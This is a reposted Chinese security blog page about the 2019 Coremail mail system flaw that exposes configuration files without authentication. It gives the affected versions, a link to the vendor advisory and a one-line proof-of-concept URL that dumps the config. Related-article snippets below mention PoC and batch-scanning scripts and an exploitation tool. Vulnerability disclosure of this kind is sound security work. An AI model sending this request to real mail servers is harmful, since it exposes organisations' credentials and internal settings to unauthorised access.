Coremail邮件系统配置文件泄露漏洞

最新推荐文章于 2024-06-07 09:42:49 发布
最新推荐文章于 2024-06-07 09:42:49 发布
阅读量2.8k 收藏 3
点赞数
文章标签: json 系统安全
原文链接:http://www.cnblogs.com/dgjnszf/p/11031932.html
版权

Coremail论客邮件系统开始研发于1999年,是中国第一套中文邮件系统,目前在中国大陆地区拥有超过10亿终端用户,是网易、中华网等运营商至今一直使用的邮件系统,也是政府、事业单位、科教、企业等机构广泛使用的邮件系统。

2019年6月,网上流传出Coremail论客邮件系统配置文件泄露的漏洞,该漏洞无需认证即可获取邮件系统的配置文件内容。

Coremail官网发布的漏洞公告:《关于Coremail邮件系统安全问题的情况说明》,http://www.coremail.cn/About/news_x/article_id/32641.htm

影响范围:Coremail XT 3.0.1至XT 5.0.9版本,XT 5.0.9a及以上版本已修复该漏洞

PoC:

http://mail.xxxxx.com/mailsms/s?func=ADMIN:appState&dumpConfig=/

 

转载于:https://www.cnblogs.com/dgjnszf/p/11031932.html

weixin_30682415
关注
Coremail邮件系统存在配置信息泄露漏洞(CNVD-2019-16798)
墨痕诉清风的博客
11-09 7781
目前,论客公司已发布补丁进行修复,针对Coremail XT5和Coremail XT3/CM5版本,补丁编号为CMXT5-2019-0002,程序版本1.1.0-alphabuild20190524(3813d273)。综合CNVD技术支撑单位报送、白帽子报送、CNVD秘书处主动探测的结果显示,我国境内共有1484台服务器受此漏洞影响,影响比例约为4.0%。邮件系统mailsms模块的参数大小写敏感存在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知。...
被攻击的一些重点系统漏洞整理
鱼的博客
08-18 1363
一、OA系统 泛微(Weaver-Ecology-OA) ???? 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ???? 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ???? 泛微ecology OA数据库配置信息泄露 https://www.cnblogs.co
Coremail接口存配置读取漏洞POC
Sylon的博客
06-14 1万+
Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。 截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户,是目前国内拥有邮箱使用用户最多的邮件系统Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、...
Coremail 远程命令执行漏洞
Jdjdjjdjdjdje的博客
08-22 3554
OSCS 是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。在 Coremail XT5/XT6 版本中,邮件处理功能存在溢出风险,攻击者构造恶意邮件,向任意邮箱地址发送该恶意邮件,当服务器处理邮件时,会触发漏洞,造成任意命令执行等危害。官方公告认为该漏洞不能稳定复现,在实际场景中难以利用,危害有限。
Coremail-0day敏感文件泄露漏洞送附批量检测脚本
热门推荐
god_Zeo的安全博客
06-17 1万+
漏洞介绍 Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年 [1] ,其前身为中国第一套中文电子邮件系统163\126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终...
mail敏感配置信息泄露
天行健,君子以自强不息
07-28 2078
生活是美好的,生命在其间又是如此短促。既然活着,就应该好好地活。应该更珍惜自己生命的每个时刻,精神上的消沉无异于自杀。像往日一样正常的投入生活吧,即便是痛苦,也应该被看做是人的正常情感,甚至它是组成我们幸福生活的一个不可缺欠的部分。
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1833
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
mysql漏洞如何打补丁_漏洞治理(漏洞情报)调研报告
weixin_39851457的博客
11-23 1419
君哥有话说漏洞运营和安全资产运营是快速收敛攻击面的最有效的两个措施,需要企业安全建设负责人首要关注,并投入大量精力确保漏洞管理的各项细节落地,包括漏洞发现、漏洞推修、漏洞验证等各个环节,这里面的细节很多,比如覆盖率、漏扫范围、漏扫技术细节(未登陆扫描、被动式扫描)、漏扫类别、漏洞修复方式、不能修的漏洞补偿性措施、漏洞考核、避免历史漏洞重现等等。推荐泉哥的一本书《漏洞战争:软件漏洞分析精要...
coremail漏洞_Coremail多个安全漏洞预警
weixin_30880565的博客
01-30 4055
1.安全公告2019年6月14,Coremail发布了3个高危漏洞的安全公告,补丁编号:CMXT5-2019-0001,涉及模块apiws,补丁修复IP限制不合理和存在路径遍历的漏洞;补丁编号:CMXT5-2019-0002,涉及模块mailsms,补丁修复信息泄露漏洞;补丁编号:CMXT5-2019-0003,涉及模块wmsvr,补丁修复信息泄露漏洞、反射型XSS、路径遍历、...
Apache Tomcat被曝存安全隐患,Coremail提醒您尽快加固
Coremail论客
02-25 1727
近日,CNVD(国家信息安全漏洞共享平台)公告Apache Tomcat被曝存在文件包含漏洞。由于Tomcat AJP协议存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行,威胁企业信息安全。 Tomcat 作为目前较为流行的 Web 应用服务器,应用范围较广,威胁影响较大。据...
重点关注!2021 Coremail邮件安全Q2季度报告!
Coremail论客
08-09 940
重磅!Coremail正式发布 《Coremail 2021年第二季度邮件安全报告》! 2021年 Q2邮件安全形势如何? 下半年各关基单位及企业如何做好邮件安全防护工作? 请下拉查收报告! 一、2021 Q2 邮件安全宏观态势:持续增长、高压态势 1、2021Q2垃圾邮件宏观态势 (2020 Q2--2021Q2 CAC 识别垃圾邮件数量) 2021年第二季度整体垃圾邮件数量较上一季度增长了15.22%,同比去年同期增长11.72%。 ...
探索CoreMailUploadRce:一款强大的邮件上传漏洞利用工具
gitblog_00064的博客
03-30 518
探索CoreMailUploadRce:一款强大的邮件上传漏洞利用工具 项目地址:https://gitcode.com/jimoyong/CoreMailUploadRce 项目简介 CoreMailUploadRce 是一个开源项目,由开发者Jimoyong开发并维护。它主要是一款针对Coremail邮件系统上传功能的漏洞利用工具。通过此工具,安全研究人员和渗透测试员能够模拟攻击场景,以检测...
邮件服务器元传出重大漏洞 目前已出现攻击程序
weixin_34106122的博客
06-14 368
近60%的服务器邮件服务器组件Exim已经通过了一个主要漏洞,允许黑客以最高权限执行任意命令。经过一周的发现,研究人员发现至少有两个群体发动了攻击,包括Linux Servo。用户特别关注他们的目标。 Exim是一种开源邮件传输代理(Mail Tansfer Agent,MTA),广泛用于全球邮件服务器。据统计,目前全球约占57%,超过50万台邮件服务器使用Exim,有些甚至估计有370万台。在...
关于coremail的0day
谁的博客
06-14 3553
#-- Coding: utf-8 -- #Author: Vulkey_Chen #Email: gh0stkey@hi-ourlife.com #Website: www.hi-ourlife.com #About: mailsms config dump PoC import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?...
无胁科技-TVD每日漏洞情报-2022-7-27
wuthreat无胁科技的博客
07-28 854
参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?漏洞编号CVE-2022-34966。漏洞编号CVE-2022-34907。...
信息泄露CVE/POC整理
weixin_34174422的博客
06-17 731
1 # CoreMail 2 # coding:utf-8 3 4 import requests 5 import warnings 6 import ssl 7 8 ssl._create_default_https_context = ssl._create_unverified_context 9 10 def verify(protocol,...
2023HW漏洞POC/EXP、情报汇总知识库(0820更新)
lurenjia404的博客
08-21 1703
分析结论:木马下载器HW总结模板一2023年,与往年的护网“划水”的角色不同 ,领导鼓励(命令)我今年要扛起写护网总结报告的大旗。作为一线“工具人”,写总结材料真的很头疼,相信很多人和我都有同感。于是在护网开始就开始着手准备总结材料,做到未雨绸缪,尤其是4月护网结束后,下面还有省级、市级护网,以及7月的建党100周年的安保,估计每次都将会少不了总结报告。特从网上搜集了总结模板,分享给大家。由于每家企业防护手段不一、组织架构不一,并且以下案例未必真实,所以完全照抄的可能性不大,所以仅供参考~~~
推荐开源项目:KnockMail - 邮箱漏洞检测利器
最新发布
gitblog_00068的博客
06-07 515
推荐开源项目:KnockMail - 邮箱漏洞检测利器 KnockMailVerify if email exists项目地址:https://gitcode.com/gh_mirrors/kn/KnockMail 1、项目介绍 KnockMail 是一个由 Alisson Moretto(GitHub 用户名 4w4k3)编写的开源工具,旨在帮助安全研究人员和白帽黑客进行电子邮件服务器的漏洞...
Coremail与国家信息安全漏洞库(CNNVD)达成深度合作!
CACTER_S的博客
11-06 195
Coremail在安全研究技术和漏洞挖掘技术的实力得到了国家权威机构的认可!
coremail邮件系统 3.0.3
11-15
coremail邮件系统 3.0.3 是一款功能强大的邮件服务软件,其主要特点包括高效稳定、安全可靠、易用灵活等。 首先,coremail邮件系统 3.0.3 支持高效稳定的邮件传输和存储,能够满足企业和个人用户大规模邮件的发送和接收需求,保障邮件系统的稳定运行。其邮件存储和检索功能能够快速高效地管理大量的邮件数据,提高工作效率。 其次,该版本的邮件系统注重安全可靠的特点,支持对邮件数据进行加密传输和安全存储,有效防范各类网络安全威胁,保护用户的隐私信息和邮件内容不被恶意攻击或窃取。 此外,coremail邮件系统 3.0.3 设计简洁易用,界面友好,操作灵活,用户可以轻松进行邮箱设置、邮件管理和查看,提升了用户体验。系统还支持灵活的配置和自定义功能,满足不同用户的个性化需求。 总的来说,coremail邮件系统 3.0.3 是一款功能强大的邮件服务软件,具有高效稳定、安全可靠、易用灵活等特点,能够满足企业和个人用户在邮件传输和管理方面的需求,是一款值得信赖的邮件系统
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值